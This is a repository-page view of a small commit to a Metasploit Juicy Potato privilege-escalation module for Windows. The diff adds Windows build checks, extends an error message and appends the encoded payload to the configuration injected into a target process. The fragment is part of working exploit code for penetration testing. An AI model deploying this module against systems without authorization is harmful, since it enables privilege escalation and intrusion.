infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

fix: improve exploit check

GSoC/Meterpreter_Web_Console
phra 2019-01-11 15:38:57 +01:00
parent cb03ffaa28
commit 7653d64c4a
No known key found for this signature in database
GPG Key ID: 91FF93D1B85D76B5
1 changed files with 10 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

11
modules/exploits/windows/local/ms16_075_reflection_juicy.rb
View File

@ -112,6 +112,14 @@ class MetasploitModule < Msf::Exploit::Local
def check
privs = client.sys.config.getprivs
win10build = client.sys.config.sysinfo['OS'].match /Windows 10 \(Build (\d+)\)/
if win10build and win10build[1] > '17134'
return Exploit::CheckCode::Safe
end
win2019build = client.sys.config.sysinfo['OS'].match /Windows 2019 \(Build (\d+)\)/
if win2019build and win2019build[1] > '17134'
return Exploit::CheckCode::Safe
end
if privs.include?('SeImpersonatePrivilege')
return Exploit::CheckCode::Appears
end
@ -129,7 +137,7 @@ class MetasploitModule < Msf::Exploit::Local
print_status("#{my_target['Arch']}")
verify_arch(my_target)
if check == Exploit::CheckCode::Safe
fail_with(Failure::NoAccess, 'User does not have SeImpersonate or SeAssignPrimaryToken Privilege')
fail_with(Failure::NoAccess, 'User does not have SeImpersonate or SeAssignPrimaryToken Privilege or Windows version not supported')
end
if my_target.opts['Arch'] == 'x64'
dll_file_name = 'juicypotato.x64.dll'
@ -161,6 +169,7 @@ class MetasploitModule < Msf::Exploit::Local
configuration += "#{datastore['RPC_IP']}\x00"
configuration += "#{datastore['RPC_PORT']}\x00"
configuration += "#{datastore['DCOM_IP']}\x00"
configuration += payload.encoded
payload_mem = inject_into_process(process, configuration)
# invoke the exploit, passing in the address of the payload that
# we want invoked on successful exploitation.